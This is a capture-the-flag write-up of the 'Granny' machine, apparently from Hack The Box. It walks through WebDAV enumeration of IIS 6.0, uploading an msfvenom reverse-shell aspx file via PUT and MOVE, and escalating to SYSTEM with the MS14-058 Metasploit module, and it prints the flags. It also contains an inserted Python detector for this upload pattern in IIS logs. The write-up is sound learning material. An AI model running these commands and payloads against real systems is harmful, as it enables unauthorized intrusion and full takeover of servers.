An application called FrontPage is running on port 80
# nmap -A -n -F -T5 granny.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:09 UTC
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 67.33% done; ETC: 13:09 (0:00:01 remaining)
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.045s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Tue, 18 Aug 2020 13:15:25 GMT
|   WebDAV type: Unknown
|_  Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP LaserJet 4250 printer (92%), OSRAM Lightify ZigBee gateway (91%), Microsoft Xbox game console (modified, running XboxMediaCenter) (91%), Denver Electronics AC-5000W MK2 camera (90%), Nintendo Wii game console (89%), SMC SMC8014WG WAP (89%), HP 170X print server or Inkjet 3000 printer (89%), HP PSC 2400-series Photosmart printer (88%), HP ProCurve 2524 switch or 9100c Digital Sender printer (88%), Netgear WGR614v7 wireless broadband router (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# nmap -T4 --script vuln 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:10 UTC
Nmap scan report for 10.10.10.15
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /_vti_bin/: Frontpage file or folder
|   /_vti_log/: Frontpage file or folder
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|   /_vti_bin/shtml.exe: Frontpage file or folder
|   /images/: Potentially interesting folder
|_  /_private/: Potentially interesting folder
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
WebDAV is enabled and file upload is possible
# perl nikto.pl -h http://granny.htb/
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    granny.htb
+ Target Port:        80
+ Start Time:         2020-08-18 15:01:46 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (MKCOL COPY SEARCH PROPFIND LOCK PROPPATCH UNLOCK listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ Retrieved x-aspnet-version header: 1.1.4322
+ 8110 requests: 6 error(s) and 26 item(s) reported on remote host
+ End Time:           2020-08-18 15:41:16 (GMT0) (2370 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# davtest --url http://granny.htb/
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://granny.htb
********************************************************
NOTE    Random string for this session: 1qjcRJmh6BgKgoh
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh
********************************************************
 Sending test files
PUT     html    SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
PUT     php     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php
PUT     asp     FAIL
PUT     cgi     FAIL
PUT     jsp     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp
PUT     jhtml   SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml
PUT     shtml   FAIL
PUT     txt     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
PUT     aspx    FAIL
PUT     cfm     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm
PUT     pl      SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl
********************************************************
 Checking for test file execution
EXEC    html    SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
EXEC    php     FAIL
EXEC    jsp     FAIL
EXEC    jhtml   FAIL
EXEC    txt     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
EXEC    cfm     FAIL
EXEC    pl      FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl
Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt

# echo "Test" > test.html
# curl -X PUT http://granny.htb/test.html -d @test.html
# curl http://granny.htb/test.html
Test
Upload the exploit code and obtain a shell
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.21 LPORT=4444 -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2716 bytes
Saved as: shell.aspx
# mv shell.aspx shell.txt
# curl -X PUT http://granny.htb/shell.txt --data-binary @shell.txt
# curl -X MOVE --header 'Destination:http://granny.htb/shell.aspx' 'http://granny.htb/shell.txt'
# msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
Requesting the uploaded page from the site gives a session. Because the session drops quickly, background it right away.
[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:34020) at 2020-08-20 14:04:59 +0000

background
Background session 1? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell sparc/bsd               172.17.0.2:4444 -> 172.17.0.1:34058 (172.17.0.1)
In other writeups the Type was Windows, but for some reason it was sparc/bsd here. This caused me quite a bit of trouble.
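The PUT-then-MOVE step above is what a defender wants to recognise in the web server's own logs. The following Python parser is an added example, not part of this writeup: it reads IIS 6.0 W3C extended log lines (the sample lines are constructed, and the column order is assumed to match the log's #Fields directive) and flags anonymous WebDAV write methods, a MOVE/COPY of a path the same client just PUT, and a follow-up request for a server-side script extension from that client.

```python
# Added detection example (not from the writeup): flag the PUT-then-MOVE
# upload trick in IIS 6.0 W3C extended logs. Sample log lines are constructed.
from datetime import datetime, timedelta

WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".ashx", ".asmx")

# Constructed sample (column order follows the #Fields directive, as IIS writes it).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-08-20 14:03:50 10.10.10.15 GET /index.html - 80 - 10.10.14.21 curl/7.68.0 200
2020-08-20 14:04:10 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.21 curl/7.68.0 201
2020-08-20 14:04:12 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.21 curl/7.68.0 201
2020-08-20 14:04:30 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.21 curl/7.68.0 200
2020-08-20 14:05:00 10.10.10.15 GET /default.aspx - 80 - 10.10.14.99 Mozilla/5.0 200
"""

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))

def find_webdav_abuse(text, window=timedelta(minutes=10)):
    """Return (time, client, rule, uri) findings for WebDAV write abuse."""
    findings = []
    puts = {}     # (client, uri) -> time of the last PUT to that path
    staged = {}   # client -> time it renamed a file it had just uploaded
    for r in parse_w3c(text):
        ts = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
        client, method, uri = r["c-ip"], r["cs-method"], r["cs-uri-stem"]
        # Rule 1: any write-capable WebDAV method without an authenticated user.
        if method in WRITE_METHODS and r.get("cs-username", "-") == "-":
            findings.append((ts, client, "anonymous_write_method", uri))
        if method == "PUT":
            puts[(client, uri)] = ts
        elif method in ("MOVE", "COPY"):
            # Rule 2: renaming a path the same client uploaded moments ago
            # (the .txt -> .aspx trick; IIS does not log the Destination header).
            put_time = puts.get((client, uri))
            if put_time and ts - put_time <= window:
                findings.append((ts, client, "put_then_rename", uri))
                staged[client] = ts
        elif uri.lower().endswith(SCRIPT_EXTS) and client in staged \
                and ts - staged[client] <= window:
            # Rule 3: that client then requests a server-side script.
            findings.append((ts, client, "script_request_after_rename", uri))
    return findings
```

Because IIS does not record the MOVE Destination header, the rename rule keys on the source path; a HEAD or GET of a script extension from the same client closes the loop.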
Find vulnerabilities from systeminfo
The collection of the systeminfo data is omitted here.
# python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo /home/shimizu/granny/systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
Obtain administrator privileges via MS14-058
msf5 exploit(multi/handler) > use windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.21
LHOST => 10.10.14.21
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.17.0.1 - Command shell session 1 closed.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:34062) at 2020-08-20 14:23:31 +0000
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ GRANNY  172.17.0.2:4444 -> 172.17.0.1:34062 (10.10.10.15)

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 2
SESSION => 2
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 3620 launched.
[*] Reflectively injecting the exploit DLL into 3620...
[*] Injecting exploit into 3620...
[*] Exploit injected. Injecting payload into 3620...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:34066) at 2020-08-20 14:24:25 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2128 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>cd C:\Documents and Settings\Lakis\Desktop
cd C:\Documents and Settings\Lakis\Desktop\

C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
700c5dc163014e22b3e408f8703f67d1

C:\Documents and Settings\Lakis\Desktop>cd C:\Documents and Settings\Administrator\Desktop
cd C:\Documents and Settings\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9